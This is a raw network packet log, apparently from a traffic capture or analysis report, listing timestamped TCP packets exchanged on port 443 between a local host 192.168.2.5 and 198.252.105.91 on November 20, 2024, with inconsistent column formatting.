                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.390116930 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.423273087 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.423291922 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.423357964 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.423372030 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.423402071 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.424659014 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.424675941 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.424714088 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.424720049 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.424746990 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.471837997 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.471858025 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.471960068 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.471970081 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.471997023 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.472651005 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.472667933 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.472711086 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.472717047 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.648952961 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.648969889 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.649604082 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.649631023 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.649660110 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.649668932 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.649688959 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.649703979 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.650528908 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.650552988 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.650583029 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.650593042 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.650613070 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.650628090 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688033104 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688062906 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688206911 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688277006 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688339949 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688529968 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688548088 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688585043 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688602924 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688627005 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.688647032 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.736664057 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.736706018 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.736826897 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.736869097 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.736885071 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.736902952 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.737663031 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.737688065 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.737713099 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.737719059 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.737741947 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.737761021 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739275932 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739299059 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739341021 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739347935 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739367008 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739384890 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739767075 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739792109 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739826918 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739835024 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739859104 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739876032 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739933014 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739957094 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739986897 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.739991903 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.740014076 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.740036964 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.743076086 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.743104935 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.743161917 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.743171930 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.743196964 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.743216991 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.743309975 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.774982929 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.775008917 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.775147915 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.775175095 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.775213003 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.776220083 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.776241064 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.776276112 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.776288033 CET44349705198.252.105.91192.168.2.5
Nov 20, 2024 10:24:35.776305914 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.776319981 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.823457003 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.823482037 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.823615074 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.823647022 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.823683977 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.824911118 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.824935913 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.824985027 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.824996948 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.825026035 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.826164007 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.826181889 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.826226950 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.826239109 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.826268911 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.827152967 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.827171087 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.827223063 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.827234983 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.827265978 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.828315020 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.828331947 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.828406096 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.828418016 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.828469038 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.829792976 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.829811096 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.829884052 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.829895973 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.829927921 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.853590012 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.859378099 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.859400988 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.859451056 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.859492064 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.859517097 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.859530926 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.859560013 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.906584978 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.906619072 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.906637907 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.906725883 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.906749010 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.906794071 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.907732010 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.907749891 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.907798052 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.907805920 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.907835007 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.907845020 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.908643961 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.908659935 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.908709049 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.908715963 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.908736944 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.908791065 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.909495115 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.909512997 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.909562111 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.909569979 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.909609079 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.910784006 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.910803080 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.910881996 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.910919905 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.910959005 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.911508083 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.911525965 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.911576033 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.911583900 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.911633015 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.946369886 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.949589014 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.949626923 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.949702024 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.949737072 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.949750900 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.949775934 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.949862957 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.949882984 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.949912071 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.949918032 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.949949026 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.949965000 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.955990076 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.993660927 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.993695021 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.993828058 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.993844986 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.993887901 CET  49705  443    192.168.2.5     198.252.105.91
Nov 20, 2024 10:24:35.998600006 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.998617887 CET  443    49705  198.252.105.91  192.168.2.5
Nov 20, 2024 10:24:35.998696089 CET  49705  443    192.168.2.5     198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998704910 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998739004 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998847008 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998863935 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998934031 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998960018 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998974085 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998975039 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.998992920 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.999002934 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.999012947 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.999032021 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.999061108 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.000338078 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.000354052 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.000391006 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.000400066 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.000416040 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.000439882 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.001053095 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.001075029 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.001142979 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.001151085 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.001177073 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.001184940 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.034610033 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.034646034 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.034729004 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.034745932 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.034804106 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.035384893 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.035418034 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.035455942 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.035463095 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.035484076 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.035506964 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.080756903 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.080785990 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.080826998 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.080859900 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.080883026 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.080897093 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.081733942 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.081758022 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.081793070 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.081801891 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.081831932 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.081851959 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.082762957 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.082792997 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.082844019 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.082850933 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.082881927 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.083836079 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.083867073 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.083910942 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.083916903 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.083945990 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.083966017 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.084676027 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.084718943 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.084744930 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.084752083 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.084779978 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.084798098 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.085850954 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.085875988 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.085907936 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.085922003 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.085942030 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:36.085959911 CET49705443192.168.2.5198.252.105.91
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 10:24:36.119267941 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.119297028 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.119340897 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.119374037 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.119409084 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.119436979 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.120735884 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.120778084 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.120805025 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.120825052 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.120848894 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.120867014 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.170200109 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.170253992 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.170295954 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.170327902 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.170348883 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.170361042 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.171072006 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.171101093 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.171154976 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.171163082 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:36.171200991 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:36.172523022 CET  443          49705      198.252.105.91   192.168.2.5
